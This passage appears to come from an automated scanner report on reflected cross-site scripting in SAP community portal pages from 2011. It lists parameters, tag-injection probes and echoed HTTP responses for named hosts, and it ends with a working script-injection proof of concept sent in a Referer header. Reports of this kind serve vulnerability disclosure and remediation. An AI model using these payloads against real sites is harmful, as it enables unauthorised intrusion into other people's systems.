This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.143. http://www.sdn.sap.com/irj/scn/about [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/about
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d19a"><a>80170f92216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA== SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ== SDN_RES_KEY: /webcontent/uuid/a89be75d-0501-0010-eb91-8b2638a2dde6 Expires: 0 Content-Length: 49406 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 23:17:16 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/ Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/about?6d19a"><a>80170f92216=1"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39fb5"><a%20b%3dc>8171187bc32 was submitted in the REST URL parameter 7. This input was echoed as 39fb5"><a b=c>8171187bc32 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a58c"><a%20b%3dc>958ec24ec72 was submitted in the REST URL parameter 8. This input was echoed as 9a58c"><a b=c>958ec24ec72 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6de3"><a%20b%3dc>04ea5cf79f2 was submitted in the REST URL parameter 9. This input was echoed as d6de3"><a b=c>04ea5cf79f2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5efbd"><a>657bf3b1c69 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 Expires: 0 Content-Length: 37310 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:50:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/go/portal/prtroot/docs/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4?QuickLink=index&overridelayout=true5efbd"><a>657bf3b1c69"> ...[SNIP]...
The value of the overridelayout request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be526"><a>f01ad06b3c6 was submitted in the overridelayout parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== SDN_RES_KEY: /library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4 Expires: 0 Content-Length: 39084 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:50:05 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c4&overridelayout=truebe526"><a>f01ad06b3c6"> ...[SNIP]...
The value of the rid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a3c"><a>c5b6921fd61 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== Expires: 0 Content-Length: 28346 Date: Sun, 13 Nov 2011 19:49:09 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/index?rid=/library/uuid/302058d8-e311-2a10-7bb8-da3fb36217c432a3c"><a>c5b6921fd61&overridelayout=true"> ...[SNIP]...
1.150. http://www.sdn.sap.com/irj/scn/submitcontent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/submitcontent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be213"><a>893894a05a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MUUtMTMzOUYzNEExN0UtMUVFRjVDODZCMzlBNDg2MA== SDN_VISIT: QUMxMDY0MUUtMTMzOUYzNTAyNDAtRjI3M0E1MTZGRDYyNTRDQQ== SDN_RES_KEY: /webcontent/uuid/8aa0e75d-0501-0010-12b3-d79d9bd33379 Expires: 0 Content-Length: 59300 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 23:17:08 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/ Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/submitcontent?be213"><a>893894a05a1=1"> ...[SNIP]...
The value of the blog request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8b3"><a>3713a2ebecb was submitted in the blog parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== Expires: 0 Content-Length: 27400 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:51:57 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/270791a8b3"><a>3713a2ebecb"> ...[SNIP]...
1.152. http://www.sdn.sap.com/irj/scn/weblogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/scn/weblogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7bf2"><a>f2495b60b2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== Expires: 0 Content-Length: 27435 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:52:31 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/weblogs?blog=/pub/wlg/27079&e7bf2"><a>f2495b60b2f=1"> ...[SNIP]...
1.153. http://www.sdn.sap.com/irj/sdn [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/sdn
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26d4"><a>de1ea131bfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUFDNzItODJGQzEyQjNERTlEMTVGNA== SDN_RES_KEY: /webcontent/uuid/b0f7b924-98a9-2d10-f594-9b48cd5b8936 Expires: 0 Content-Length: 76859 Date: Sun, 13 Nov 2011 19:46:56 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn?d26d4"><a>de1ea131bfa=1"> ...[SNIP]...
1.154. http://www.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sdn.sap.com
Path:
/irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccbf"><a>83f1a41f0f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== Expires: 0 Content-Length: 25006 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:50:49 GMT Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915&1ccbf"><a>83f1a41f0f2=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b262c"><a>ecdfa6545a5 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MUEtMTMzOUU3NUQzNTAtNDYzQUExNkZFRDA1NzhDNw== Expires: 0 Content-Length: 21882 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:49:38 GMT Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums.sdn.sap.com%3A80%2Fmessage.jspa%3FmessageID%3D7893915b262c"><a>ecdfa6545a5"> ...[SNIP]...
The value of the displayName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1cb6"><a%20b%3dc>988efa6ea6 was submitted in the displayName parameter. This input was echoed as d1cb6"><a b=c>988efa6ea6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb50"><a%20b%3dc>7975eb96168 was submitted in the email parameter. This input was echoed as 2fb50"><a b=c>7975eb96168 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the firstName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9fe"><a%20b%3dc>6d7a8b5e4ab was submitted in the firstName parameter. This input was echoed as cc9fe"><a b=c>6d7a8b5e4ab in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ebaf"><a%20b%3dc>6c62ba37275 was submitted in the lastName parameter. This input was echoed as 5ebaf"><a b=c>6c62ba37275 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <input maxlength="64" type="text" name="lastName" id="lastName" class="" onblur="validatePublicLastName(false)" value="xss5ebaf"><a b=c>6c62ba37275"/> ...[SNIP]...
1.160. http://www400.sdn.sap.com/irj/boc [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www400.sdn.sap.com
Path:
/irj/boc
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210cd"><a>bc448a96f9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 62578 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:51:31 GMT Connection: close Set-Cookie: PortalAlias=boc; Path=/ Set-Cookie: PortalAlias=boc; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/boc?210cd"><a>bc448a96f9b=1"> ...[SNIP]...
1.161. http://www400.sdn.sap.com/irj/scn/help-portal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www400.sdn.sap.com
Path:
/irj/scn/help-portal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 598d1"><a>cbc4ee84307 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 32233 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:50:58 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/help-portal?598d1"><a>cbc4ee84307=1"> ...[SNIP]...
1.162. http://www400.sdn.sap.com/irj/scn/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www400.sdn.sap.com
Path:
/irj/scn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a451"><a>d1a7fcc6a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 20378 Date: Sun, 13 Nov 2011 19:54:47 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... /irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal&1a451"><a>d1a7fcc6a81=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6ab"><a>299721fd6ca was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 21479 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:51:42 GMT Connection: close Set-Cookie: PortalAlias=scn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/scn/logon?redirect=/irj/scn/help-portal&redirect=%2Firj%2Fscn%2Fhelp-portaled6ab"><a>299721fd6ca&redirect=%2Firj%2Fscn%2Fhelp-portal&redirect=%2Firj%2Fscn%2Fhelp-portal"> ...[SNIP]...
1.164. http://www400.sdn.sap.com/irj/sdn/logon [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www400.sdn.sap.com
Path:
/irj/sdn/logon
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73661"><a>e3398a6f2f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 21894 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:51:38 GMT Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1&73661"><a>e3398a6f2f1=1"> ...[SNIP]...
The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e05ee"><a>9a7faa0d167 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 Content-Language: en Content-Type: text/html; charset=UTF-8 SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MzAtMTMzOUU3N0YyMEYtNDg5OUI5MTJEODNGNjMwRg== Expires: 0 Content-Length: 22036 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:50:57 GMT Connection: close Set-Cookie: PortalAlias=sdn; Path=/ Set-Cookie: PortalAlias=sdn; Path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th ...[SNIP]... <a href="/irj/scn/logon?redirect=/irj/sdn/logon?redirect=http%3A%2F%2Fforums400.sdn.sap.com%3A80%2Fthread.jspa%3FthreadID%3D480818%269751ab%3Fxss%3D1e05ee"><a>9a7faa0d167"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec41b"><script>alert(1)</script>36e9502d047 was submitted in the Referer HTTP header. This input was echoed as ec41b\"><script>alert(1)</script>36e9502d047 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /download_plugin.php3 HTTP/1.1 Host: connectblrl02.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ec41b"><script>alert(1)</script>36e9502d047
Response
HTTP/1.1 200 OK Date: Mon, 14 Nov 2011 03:04:40 GMT Server: Apache Connection: Close Expires: 0 Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Type: text/html Content-Length: 531
